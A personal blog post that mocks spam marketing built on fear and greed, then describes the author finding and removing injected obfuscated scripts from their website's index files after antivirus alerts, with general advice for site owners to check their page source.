I was going to do a post on marketing and the B.S. tactics that are increasingly in use. Indeed, this blog gets an average of six comment posts a week extolling the virtues of low-cost faux boner pills and heart medication (I’d be wary of the latter), or how to get rich by marketing faux boner pills and heart medication. There are plenty of others, and all have the commonality of playing upon two major human weaknesses: Fear and Greed. The Greed is pretty straight-forward; who doesn’t want to be rich? But the fear is more insidious as there are tons of things people are afraid of, such as:
- My Health: I’m afraid to die! Give me pills that allow me to live forever, even though my retirement money will run out soon.
- My Wealth: I’m afraid of being poor and homeless. This fear is the least unfounded of the group, these days.
- My Social Standing: I’m afraid that if I don’t keep up with the latest fads and trends I’ll be considered in some unflattering light.
- My Connectivity: I’m afraid that if I absolutely, positively, cannot be in constant communication with everyone I know, and update my Facebook status from anywhere, I will miss out on something!
- My Boner: I’m afraid that if I can’t perform sexually, all the time, every time, my wife/girlfriend/life-partner will look for sex elsewhere.
- My Toilet Paper: I am terribly afraid that my toilet paper will leave little pieces on my buttocks, or that guests to my home will see the roll.
- Everything Else: I’m afraid of everything, but I am also afraid of being Agoraphobic. Sell me something quick, to comfort me and give my life meaning!
And there are plenty more you could come up with, I’m sure. But, these marketing tactics are nothing new (think of how many bomb shelters were sold during the height of the Cold War. Ah, the good old days…), and pointing them out is a fool’s errand as few people apply reason where Fear and Greed are concerned.
Instead, the point of this post is to share something I discovered today while doing some website housekeeping: the existence of some nasty little scripts added to my page code. I wouldn’t have noticed them were it not for Microsoft Security Essentials (MSE), in conjunction with a site-wide backup, bringing the scripts to light.
The backup was done by my S.O.P.: I ftp the website folders to a directory on my home computer and download a zipped copy of the MySQL table schema to the same directory. Simple enough…I’d done this a few dozen times before. But, this time around, the MSE was throwing frequent alerts to a known Trojan. This is not wholly unusual with heuristic Anti-Virus if a normally safe bit of code resembles something in the AV database. However, I know I haven’t written anything Trojan-like, and more than one alert made me think there was some serious poop happening. My suspicions were confirmed when I could not open a file locally in notepad; MSE squashed that with a quickness! I browsed up to my CPanel and did a little snooping in the files with the on-site editor. What I found was a cryptic script appended to every instance of a generic entry file throughout the site: index.php, index.html, and default.html. About 30 minutes of searching for and deleting these pests (while muttering profuse epithets toward the scum that deposited the scripts in the first place) resulted in being able to backup my site without MSE flags being raised.
Thinking that this might not be an isolated event, I immediately did a backup of a client’s sites and came across the same scripts, and in some cases additional scrips added to the top of the page. What the hell? Oh, well. Repeat the cleaning process and move on. That was three hours I’ll never get back. But, it got me to thinking: How did they get there?
The why is pretty easy. Evil hackers look for all sorts of ways to get their grubby little scripts onto as many individual computers as they can for all sorts of nefarious purposes. There is big money in furtively collecting personal and financial information from unsuspecting users, for example, or zombie-fying a slew of computers to perpetrate a Distributed Denial of Service (DDoS) attack in an extortion plot against a large web-connected entity (banks, the FBI, maybe the power grid?).
But, the how still eludes me. I don’t think my passwords were hacked, else the scripts would have shown up on all my site pages. Indeed, there could have been some better-hidden funkiness stuck into called-code that I might never have noticed without a line-by-line investigation. So, no, I don’t believe this was a hands-on attack. This is an automated thing (a worm?) that looks for the common entry-point files in a site and deposits its manure on the fertile fields at the top or bottom before crawling off to infect someone else.
So, what to do? I’m not sure. One thing I’m going to try is to find some way of giving my entry-point files a different name. Something cryptic that will thwart guessing. I believe that can be accomplished through the .htaccess file. The main thing is to get away from the generic tags that are easy targets.
Finally, if you have a website, blog, maybe even your Facebook page, you may want to look at the source code (you can do that in IE and Firefox with a right-click and View Source) to see if there are any long strings of two or three character clusters at the top or bottom of the page. If there are, remove them if you can. If not, tell somebody (look for a “contact us” link). There may be occasions where a single-line, un-commented, and poorly located script like that is there for a good reason, but I can’t think of one.